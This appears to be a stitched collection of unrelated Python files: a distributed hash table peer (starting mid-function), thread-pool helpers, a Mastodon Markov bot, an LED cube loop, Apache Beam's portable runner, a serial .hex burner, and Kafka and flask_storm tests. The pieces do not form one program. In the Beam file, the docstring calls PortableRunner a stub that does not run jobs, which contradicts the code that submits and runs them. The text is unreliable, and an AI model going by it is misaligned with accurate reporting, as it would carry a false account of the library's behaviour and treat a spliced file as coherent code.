key = (self.key + 2**i) % MAX_KEY
if not inside(key, self.key, self.chain[0][0]):
self.chords[i] = self.find_re(key)
logging.debug("%d chords established" %
sum([1 for x in self.chords if x is not None]))
def inside(key, left, right):
"""
Find whether the key is in the interval `[left, right)`.
Note the keys are arranged on a ring, so it is possible that left > right.
"""
if left == right:
return False
if left < right:
return left <= key < right
else:
return left <= key or key < right
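# Worked examples (the interval may wrap around zero on the ring):
#   inside(11, 10, 3)           -> True   (10 <= 11, wrapping interval)
#   inside(5, 10, 3)            -> False  (5 is outside [10, 3))
#   inside(1, MAX_KEY - 2, 3)   -> True   (wraps past 0)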
def request(url, operation, key, value=None):
logging.debug('Requesting from %s operation %s key %x value %s' %
(url, operation, key, value))
sock = _connect(url)
body = bytes("%s %x\n" % (operation, key), 'ascii')
if value:
body += bytes("%d\n" % len(value), 'ascii')
body += value
try:
sock.sendall(body)
inh = sock.makefile('rb')
response = inh.readline()
if response.startswith(b'value'):
logging.debug(response)
length = int(response.split()[1])
return inh.read(length)
elif response.startswith(b'none'):
raise KeyError("Key %x not in DHT" % key)
elif response.startswith(b'peer'):
logging.debug('Raw response %s' % response)
return _parse_peer(response)
elif response.startswith(b'me'):
key = int(response.split()[1], base=16)
return Me([key, url])
elif response.startswith(b'chain'):
chain = []
for line in inh:
chain.append(_parse_peer(line))
return chain
finally:
sock.close()
return response
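# Wire-format sketch, derived from request() above and Handler.handle() below:
#   request body:  b"get 1a2b\n"            (operation and hex key)
#                  b"put 1a2b\n5\nhello"    (plus value length and raw bytes)
#   responses:     b"value 5\nhello" | b"none" | b"peer <key> <url>\n"
#                  b"me <key>\n" | b"chain\n<peer lines...>" | b"ok" | b"pong"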
class Handler(socketserver.StreamRequestHandler):
peer = None
def handle(self):
inh = self.rfile
operation, key = inh.readline().split()
key = int(key, base=16)
logging.info("Request: %s %x" % (operation, key))
response = b'unknown operation'
if operation == b'find':
peer = self.peer.find(key)
if peer is None:
response = bytes("me %x\n" % self.peer.key, 'ascii')
else:
response = _serialize_peer(peer)
elif operation == b'accept':
response = b"chain\n"
for peer in self.peer.chain:
response += _serialize_peer(peer)
port = int(_read_value(inh))
self.peer.accept(key, _make_url(self.request, port))
elif operation == b'get':
value = self.peer.get(key)
if value is None:
response = b'none'
else:
response = bytes("value %d\n" % len(value), 'ascii')
response += value
elif operation == b'put':
value = _read_value(inh)
logging.debug("Value: %s" % value)
self.peer.put(key, value)
response = b'ok'
elif operation == b'ping':
response = b'pong'
logging.debug("Response: %s\n" % response)
self.request.sendall(response)
def _read_value(inh):
length = int(inh.readline())
return inh.read(length)
class Server(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
class Address(tuple): # Hate I can't define my own __init__
pass
class Me(Address):
pass
def _parse_peer(line):
if line.startswith(b'peer'):
key, url = line.split()[1:]
return Address([int(key, base=16), url])
elif line.startswith(b'none'):
return None
else:
raise ValueError('Wrong response for peer %s' % line)
def _serialize_peer(peer):
if peer is None:
return b'none'
else:
return bytes("peer %x %s\n" % (peer[0], str(peer[1], 'ascii')),
'ascii')
def _make_url(socket, port=None):
#FIXME: this gives us the request socket, not the listening one
if port is None:
return bytes("%s:%d" % socket.getpeername(), 'ascii')
else:
return bytes("%s:%d" % (socket.getpeername()[0], port), 'ascii')
def _connect(url):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if isinstance(url, bytes):
url = str(url, 'ascii')
if ':' in str(url):
host, port = url.split(':')
port = int(port)
else:
host, port = url, 4321
sock.connect((host, port))
return sock
def main():
import argparse
argp = argparse.ArgumentParser(description=__doc__)
argp.add_argument('-key', help='hexadecimal key for this node')
argp.add_argument('-url', help='url of an existing DHT peer')
argp.add_argument('-port', help='listening TCP port',
type=int, default=4321)
args = argp.parse_args()
if args.key is not None:
args.key = int(args.key, 16)
peer = Peer(port=args.port, key=args.key)
if args.url:
peer.connect(args.url)
peer.start()
if __name__ == '__main__':
main()
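# Example (addresses and keys are illustrative):
#   python3 peer.py -port 4321                        # start the first node
#   python3 peer.py -port 4322 -url 127.0.0.1:4321    # join via an existing peer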
|
thread_.py
|
import threading
from threading import Thread
def get_current_thread():
return threading.current_thread()
def get_current_thread_name():
return get_current_thread().getName()
def is_alive(t):
return t.is_alive()
def create_and_start(name, target, daemon = True):
t = Thread(target= target)
t.daemon = daemon
t.setName(name)
t.start()
return t
class ThreadPool(object):
def __init__(self, capacity = 10):
import threadpool
self.num_threads = capacity
self.pool = threadpool.ThreadPool(capacity)
def add(self, fn, args):
import threadpool
if type(args) == list:
args = [(args, None)]
elif type(args) == dict:
args = [(None, args)]
else:
raise ValueError("Unsuported args,", type(args))
request = threadpool.makeRequests(fn, args)[0]
self.pool.putRequest(request, block = False)
self.pool.poll()
def join(self):
self.pool.wait()
class ProcessPool(object):
"""
Remember that nested functions (a function defined inside another function) are not supported by multiprocessing.
"""
def __init__(self, capacity = 8):
from multiprocessing import Pool
self.capacity = capacity
self.pool = Pool(capacity)
def add(self, fn, args):
self.pool.apply_async(fn, args)
# self.pool.poll()
# self.pool.poll
def join(self):
self.pool.close()
self.pool.join()
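# Usage sketch (my_fn is illustrative):
#   tp = ThreadPool(capacity=4)
#   tp.add(my_fn, [1, 2])        # positional args go in a list, keyword args in a dict
#   tp.join()
#   pp = ProcessPool(capacity=4)
#   pp.add(my_fn, (1, 2))        # apply_async-style args tuple
#   pp.join()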
|
app.py
|
#!/usr/bin/env python3
import configparser
import time
import threading
import mastodonTool
import os
import datetime
import markovify
import exportModel
import re
# Load environment variables
config_ini = configparser.ConfigParser()
config_ini.read('config.ini', encoding='utf-8')
def worker():
# Training
domain = config_ini['read']['domain']
read_access_token = config_ini['read']['access_token']
write_domain = config_ini['write']['domain']
write_access_token = config_ini['write']['access_token']
account_info = mastodonTool.get_account_info(domain, read_access_token)
params = {"exclude_replies": 1, "exclude_reblogs": 1}
filename = "{}@{}".format(account_info["username"], domain)
filepath = os.path.join("./chainfiles", os.path.basename(filename.lower()) + ".json")
if (os.path.isfile(filepath) and datetime.datetime.now().timestamp() - os.path.getmtime(filepath) < 60 * 60 * 24):
print("モデルは再生成されません")
else:
exportModel.generateAndExport(mastodonTool.loadMastodonAPI(domain, read_access_token, account_info['id'], params), filepath)
print("LOG,GENMODEL," + str(datetime.datetime.now()) + "," + account_info["username"].lower()) # Log
# Generation
with open("./chainfiles/{}@{}.json".format(account_info["username"].lower(), domain)) as f:
textModel = markovify.Text.from_json(f.read())
sentence = textModel.make_sentence(tries=300)
sentence = "".join(sentence.split()) + ' #bot'
sentence = re.sub(r'(:.*?:)', r' \1 ', sentence)
print(sentence)
try:
mastodonTool.post_toot(write_domain, write_access_token, {"status": sentence})
except Exception as e:
print("投稿エラー: {}".format(e))
def schedule(f, interval=1200, wait=True):
base_time = time.time()
next_time = 0
while True:
t = threading.Thread(target=f)
t.start()
if wait:
t.join()
next_time = ((base_time - time.time()) % interval) or interval
time.sleep(next_time)
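# Note: ((base_time - time.time()) % interval) keeps each run anchored to the
# original `base_time` grid, so the start times do not drift even when worker()
# takes a long time; the `or interval` fallback avoids a zero-length sleep.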
if __name__ == "__main__":
# Periodic execution
schedule(worker)
# worker()
|
main.py
|
from ledcd import CubeDrawer
from falling_helper import *
import colorsys
from random import random
import threading
import time
drawer = CubeDrawer.get_obj()
plane = FallingWall(0, 1.5, colorsys.hsv_to_rgb(random(), 1, 1), drawer)
# drawer.translate(7.5, 7.5, 7.5)
# drawer.scale(0.5, 0.5, 0.5)
def plane_updater():
global plane
counter = 0
while True:
time.sleep(2.8)
counter += 1
plane = FallingWall(counter % 4, 1, colorsys.hsv_to_rgb(random(), 1, 1), drawer)
threading.Thread(target=plane_updater, daemon=True).start()
while True:
drawer.clear()
plane.update()
plane.draw()
drawer.show()
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
# mypy: check-untyped-defs
import atexit
import functools
import itertools
import logging
import threading
import time
from typing import TYPE_CHECKING
from typing import Any
from typing import Dict
from typing import Iterator
from typing import Optional
from typing import Tuple
import grpc
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.options.value_provider import ValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner.fn_runner import translations
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.pipeline import Pipeline
from apache_beam.portability.api import beam_runner_api_pb2
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.DRAINED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}
_LOGGER = logging.getLogger(__name__)
class JobServiceHandle(object):
"""
Encapsulates the interactions necessary to submit a pipeline to a job service.
The base set of interactions consists of 3 steps:
- prepare
- stage
- run
"""
def __init__(self, job_service, options, retain_unknown_options=False):
self.job_service = job_service
self.options = options
self.timeout = options.view_as(PortableOptions).job_server_timeout
self.artifact_endpoint = options.view_as(PortableOptions).artifact_endpoint
self._retain_unknown_options = retain_unknown_options
def submit(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""
Submit and run the pipeline defined by `proto_pipeline`.
"""
prepare_response = self.prepare(proto_pipeline)
artifact_endpoint = (
self.artifact_endpoint or
prepare_response.artifact_staging_endpoint.url)
self.stage(
proto_pipeline,
artifact_endpoint,
prepare_response.staging_session_token)
return self.run(prepare_response.preparation_id)
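# Sketch of how the three steps are typically driven (names per this module):
#   handle = PortableRunner().create_job_service(options)
#   job_id, message_stream, state_stream = handle.submit(proto_pipeline)
# submit() composes prepare(), stage() and run() defined below.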
def get_pipeline_options(self):
# type: () -> struct_pb2.Struct
"""
Get `self.options` as a protobuf Struct
"""
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
return self.job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest(),
timeout=self.timeout)
except grpc.FutureTimeoutError:
# no retry for timeout errors
raise
except grpc.RpcError as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action': 'store', 'help': option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true' \
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
_LOGGER.debug("Runner option '%s' was already added" % option.name)
all_options = self.options.get_all_options(
add_extra_args_fn=add_runner_options,
retain_unknown_options=self._retain_unknown_options)
return self.encode_pipeline_options(all_options)
@staticmethod
def encode_pipeline_options(
all_options: Dict[str, Any]) -> 'struct_pb2.Struct':
def convert_pipeline_option_value(v):
# convert int values: BEAM-5509
if type(v) == int:
return str(v)
elif isinstance(v, ValueProvider):
return convert_pipeline_option_value(
v.get()) if v.is_accessible() else None
return v
# TODO: Define URNs for options.
p_options = {
'beam:option:' + k + ':v1': convert_pipeline_option_value(v)
for k,
v in all_options.items() if v is not None
}
return job_utils.dict_to_struct(p_options)
def prepare(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> beam_job_api_pb2.PrepareJobResponse
"""Prepare the job on the job service"""
return self.job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job',
pipeline=proto_pipeline,
pipeline_options=self.get_pipeline_options()),
timeout=self.timeout)
def stage(self,
proto_pipeline, # type: beam_runner_api_pb2.Pipeline
artifact_staging_endpoint,
staging_session_token
):
# type: (...) -> None
"""Stage artifacts"""
if artifact_staging_endpoint:
artifact_service.offer_artifacts(
beam_artifact_api_pb2_grpc.ArtifactStagingServiceStub(
channel=grpc.insecure_channel(artifact_staging_endpoint)),
artifact_service.ArtifactRetrievalService(
artifact_service.BeamFilesystemHandler(None).file_reader),
staging_session_token)
def run(self, preparation_id):
# type: (str) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""Run the job"""
try:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=preparation_id),
timeout=self.timeout)
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain([next(state_stream)], state_stream)
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=preparation_id),
timeout=self.timeout)
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result, we don't set a timeout here because
# it may take a long time for a job to complete and streaming
# jobs currently never return a response.
run_response = self.job_service.Run(
beam_job_api_pb2.RunJobRequest(preparation_id=preparation_id))
if state_stream is None:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=run_response.job_id))
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=run_response.job_id))
return run_response.job_id, message_stream, state_stream
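# The three methods above are typically driven in sequence by a caller such as
# submit(): prepare() returns a preparation id, an artifact staging endpoint
# and a staging session token, stage() uploads the artifacts, and run() starts
# the job and returns the message/state streams. A rough, assumed sketch:
#   prepare_response = handle.prepare(proto_pipeline)
#   handle.stage(proto_pipeline,
#                prepare_response.artifact_staging_endpoint.url,
#                prepare_response.staging_session_token)
#   job_id, messages, states = handle.run(prepare_response.preparation_id)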
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self):
self._dockerized_job_server = None # type: Optional[job_server.JobServer]
@staticmethod
def _create_environment(options):
# type: (PipelineOptions) -> environments.Environment
portable_options = options.view_as(PortableOptions)
# Do not set a Runner. Otherwise this can cause problems in Java's
# PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
# does not exist in the Java SDK. In portability, the entry point is clearly
# defined via the JobService.
portable_options.view_as(StandardOptions).runner = None
environment_type = portable_options.environment_type
if not environment_type:
environment_urn = common_urns.environments.DOCKER.urn
elif environment_type.startswith('beam:env:'):
environment_urn = environment_type
else:
# e.g. handle LOOPBACK -> EXTERNAL
environment_type = ENV_TYPE_ALIASES.get(
environment_type, environment_type)
try:
environment_urn = getattr(
common_urns.environments, environment_type).urn
except AttributeError:
raise ValueError('Unknown environment type: %s' % environment_type)
env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
return env_class.from_options(portable_options)
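# Examples of how the environment type is resolved above (illustrative only):
#   (unset)          -> the default DOCKER urn (typically 'beam:env:docker:v1')
#   'beam:env:...'   -> used verbatim as the urn
#   'LOOPBACK'       -> aliased to EXTERNAL via ENV_TYPE_ALIASES, then looked up
#   'PROCESS'        -> looked up by name on common_urns.environments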
def default_job_server(self, options):
raise NotImplementedError(
'You must specify a --job_endpoint when using --runner=PortableRunner. '
'Alternatively, you may specify which portable runner you intend to '
'use, such as --runner=FlinkRunner or --runner=SparkRunner.')
def create_job_service_handle(self, job_service, options):
# type: (...) -> JobServiceHandle
return JobServiceHandle(job_service, options)
def create_job_service(self, options):
# type: (PipelineOptions) -> JobServiceHandle
"""
Start the job service and return a `JobServiceHandle`
"""
job_endpoint = options.view_as(PortableOptions).job_endpoint
if job_endpoint:
if job_endpoint == 'embed':
server = job_server.EmbeddedJobServer() # type: job_server.JobServer
else:
job_server_timeout = options.view_as(PortableOptions).job_server_timeout
server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
else:
server = self.default_job_server(options)
return self.create_job_service_handle(server.start(), options)
@staticmethod
def get_proto_pipeline(pipeline, options):
# type: (Pipeline, PipelineOptions) -> beam_runner_api_pb2.Pipeline
portable_options = options.view_as(PortableOptions)
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# TODO: https://issues.apache.org/jira/browse/BEAM-7199
# Eventually remove the 'pre_optimize' option altogether and only perform
# the equivalent of the 'default' case below (minus the 'lift_combiners'
# part).
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'default').lower()
if (not options.view_as(StandardOptions).streaming and
pre_optimize != 'none'):
if pre_optimize == 'default':
phases = [
# TODO: https://issues.apache.org/jira/browse/BEAM-4678
# https://issues.apache.org/jira/browse/BEAM-11478
# Eventually remove the 'lift_combiners' phase from 'default'.
translations.pack_combiners,
translations.lift_combiners,
translations.sort_stages
]
partial = True
elif pre_optimize == 'all':
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = False
elif pre_optimize == 'all_except_fusion':
# TODO(BEAM-7248): Delete this branch after PortableRunner supports
# beam:runner:executable_stage:v1.
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
# translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = True
else:
phases = []
for phase_name in pre_optimize.split(','):
# For now, these are all we allow.
if phase_name in ('pack_combiners', 'lift_combiners'):
phases.append(getattr(translations, phase_name))
else:
raise ValueError(
'Unknown or inapplicable phase for pre_optimize: %s' %
phase_name)
phases.append(translations.sort_stages)
partial = True
# All (known) portable runners (i.e. Flink and Spark) support these URNs.
known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn
])
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=phases,
known_runner_urns=known_urns,
partial=partial)
return proto_pipeline
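# Illustrative example (assumed flag spelling): for a batch pipeline, passing
#   --experiments pre_optimize=pack_combiners
# would run only the pack_combiners phase plus sort_stages as a partial
# optimization, whereas the default batch behaviour applies pack_combiners,
# lift_combiners and sort_stages.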
def run_pipeline(self, pipeline, options):
# type: (Pipeline, PipelineOptions) -> PipelineResult
portable_options = options.view_as(PortableOptions)
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
experiments = options.view_as(DebugOptions).experiments or []
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
use_loopback_process_worker = options.view_as(
DebugOptions).lookup_experiment('use_loopback_process_worker', False)
portable_options.environment_config, server = (
worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
state_cache_size=
sdk_worker_main._get_state_cache_size(experiments),
data_buffer_time_limit_ms=
sdk_worker_main._get_data_buffer_time_limit_ms(experiments),
use_process=use_loopback_process_worker))
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = self.get_proto_pipeline(pipeline, options)
job_service_handle = self.create_job_service(options)
job_id, message_stream, state_stream = \
job_service_handle.submit(proto_pipeline)
result = PipelineResult(
job_service_handle.job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks)
if cleanup_callbacks:
# Register an exit handler to ensure cleanup on exit.
atexit.register(functools.partial(result._cleanup, on_exit=True))
_LOGGER.info(
'Environment "%s" has started a component necessary for the '
'execution. Be sure to run the pipeline using\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.',
portable_options.environment_type)
return result
class PortableMetrics(metric.MetricResults):
def __init__(self, job_metrics_response):
metrics = job_metrics_response.metrics
self.attempted = portable_metrics.from_monitoring_infos(metrics.attempted)
self.committed = portable_metrics.from_monitoring_infos(metrics.committed)
@staticmethod
def _combine(committed, attempted, filter):
all_keys = set(committed.keys()) | set(attempted.keys())
return [
MetricResult(key, committed.get(key), attempted.get(key))
for key in all_keys if metric.MetricResults.matches(filter, key)
]
def query(self, filter=None):
counters, distributions, gauges = [
self._combine(x, y, filter)
for x, y in zip(self.committed, self.attempted)
]
return {
self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges
}
class PipelineResult(runner.PipelineResult):
def __init__(
self,
job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks=()):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
self._metrics = None
self._runtime_exception = None
def cancel(self):
# type: () -> None
try:
self._job_service.Cancel(
beam_job_api_pb2.CancelJobRequest(job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(
runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
if not self._metrics:
job_metrics_response = self._job_service.GetJobMetrics(
beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
self._metrics = PortableMetrics(job_metrics_response)
return self._metrics
def _last_error_message(self):
# type: () -> str
# Filter only messages with the "message_response" and error messages.
messages = [
m.message_response for m in self._messages
if m.HasField('message_response')
]
error_messages = [
m for m in messages
if m.importance == beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR
]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self, duration=None):
"""
:param duration: The maximum time in milliseconds to wait for the result of
the execution. If None or zero, will wait until the pipeline finishes.
:return: The result of the pipeline, i.e. PipelineResult.
"""
def read_messages():
# type: () -> None
previous_state = -1
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
current_state = message.state_response.state
if current_state != previous_state:
_LOGGER.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(current_state))
previous_state = current_state
self._messages.append(message)
message_thread = threading.Thread(
target=read_messages, name='wait_until_finish_read')
message_thread.daemon = True
message_thread.start()
if duration:
state_thread = threading.Thread(
target=functools.partial(self._observe_state, message_thread),
name='wait_until_finish_state_observer')
state_thread.daemon = True
state_thread.start()
start_time = time.time()
duration_secs = duration / 1000
while (time.time() - start_time < duration_secs and
state_thread.is_alive()):
time.sleep(1)
else:
self._observe_state(message_thread)
if self._runtime_exception:
raise self._runtime_exception
return self._state
def _observe_state(self, message_thread):
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
message_thread.join(10)
break
if self._state != runner.PipelineState.DONE:
self._runtime_exception = RuntimeError(
'Pipeline %s failed in state %s: %s' %
(self._job_id, self._state, self._last_error_message()))
except Exception as e:
self._runtime_exception = e
finally:
self._cleanup()
def _cleanup(self, on_exit=False):
# type: (bool) -> None
if on_exit and self._cleanup_callbacks:
_LOGGER.info(
'Running cleanup on exit. If your pipeline should continue running, '
'be sure to use the following syntax:\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.')
first_exception = None
for callback in self._cleanup_callbacks:
try:
callback()
except Exception as e:
# remember the first failure but keep running the remaining callbacks
if first_exception is None:
first_exception = e
self._cleanup_callbacks = ()
if first_exception is not None:
raise first_exception
|
BurnerManager.py
|
import serial
import serial.tools.list_ports as port_list
from time import sleep as delay
from Utils import Utils
import threading
import sys
from collections import deque as dq
class BurnerManager:
def __init__(self, SerialManager, file, progressBar, console):
self.progressBar = progressBar
self.serialManager = SerialManager
self.fileManager = file
self.console = console
self.console.pub('Burner Manager Started\n')
def burn(self):
self.console.pub('\nBurn .hex file \n')
threading.Thread(target=self.burn_task, daemon=True).start()
def burn_task(self):
code = self.fileManager.code
if not self.serialManager.connected:
self.serialManager.connect()
res = 'BAD'
for i, line in enumerate(code):
self.serialManager.connection.flushInput()
self.serialManager.write_port_byte(line)
while True:
res = self.serialManager.connection.readline().decode().split('\n')[0]
code = ''
if (res == 'BAD'):
self.console.pub('{} - {} - Transmission error - resending...\n'.format(i, line))
self.serialManager.connection.flushInput()
self.serialManager.write_port_byte(line)
elif (res == 'OK'):
self.serialManager.connection.flushInput()
self.console.pub('{} - {} - Line sent successfully.\n'.format(i, line))
print('{} - {} - Line sent successfully.'.format(i, res))
break
self.console.pub('Burn finished')
print('Burn finished')
# print('Size of trama:',size)
# size = int(line[1:3],16)+5
# for l in range(size):
# temp = self.serialManager.connection.read()
# code += temp.hex()
# self.console.pub('{} - :{} - Line sent successfully.\n'.format(i, code.upper()))
# code = res = ''
|
test_kafka.py
|
from multiprocessing import Process, Queue
from unittest import TestCase
from threading import Thread
from time import sleep
from unittest.mock import MagicMock
from minibatch import connectdb, stream, streaming, make_emitter
from minibatch.contrib.kafka import KafkaSource, KafkaSink
from minibatch.tests.util import delete_database, LocalExecutor
class KafkaTests(TestCase):
def setUp(self):
self.url = 'mongodb://localhost/test'
delete_database(url=self.url)
self.db = connectdb(url=self.url)
def test_consumer(self):
# we simply inject a mock KafkaConsumer into the KafkaSource
# as we don't want to test KafkaConsumer but KafkaSource
message = MagicMock()
message.value = dict(foo='bar')
source = KafkaSource('topic')
consumer = MagicMock()
consumer.__iter__.return_value = [message]
source._consumer = consumer
s = stream('test', url=self.url)
s.attach(source)
def consumer(q):
url = str(self.url)
@streaming('test', executor=LocalExecutor(), url=url, queue=q)
def process(window):
db = connectdb(url=url)
db.processed.insert(window.data)
q = Queue()
p = Process(target=consumer, args=(q,))
p.start()
sleep(1)
q.put(True)
p.join()
docs = list(self.db.processed.find())
self.assertEqual(len(docs), 1)
def test_sink(self):
# we simply inject a mock KafkaProducer into the KafkaSink
s = stream('test', url=self.url)
s.append(dict(foo='baz'))
sink = KafkaSink('test')
producer = MagicMock()
sink._producer = producer
# create a threaded emitter that we can stop
em = make_emitter('test', url=self.url, sink=sink, emitfn=lambda v: v)
t = Thread(target=em.run)
t.start()
sleep(1)
em._stop = True
# check the sink got called and forward to the mock KafkaProducer
producer.send.assert_called_with('test', value={'foo': 'baz'})
|
test_debug.py
|
import pytest
import re
import sys
from datetime import datetime, timedelta
from flask_storm import store, FlaskStorm
from flask_storm.debug import DebugTracer, get_debug_queries, DebugQuery, ShellTracer
from mock import MagicMock, patch
from storm.exceptions import OperationalError
from threading import Thread
try:
from io import StringIO
except ImportError:
from StringIO import StringIO
# Enable skipping of tests that do not run without sqlparse being installed
try:
import sqlparse
except ImportError:
sqlparse = None
require_sqlparse = pytest.mark.skipif(not sqlparse, reason="requires sqlparse")
require = pytest.mark.usefixtures
@require("app", "flask_storm", "app_context")
def test_get_debug_queries():
with DebugTracer():
store.execute("SELECT 1")
store.execute("SELECT ? + ?", [1, 2])
queries = get_debug_queries()
assert len(queries) == 2
first, second = queries
assert first.statement == "SELECT 1"
assert first.params == ()
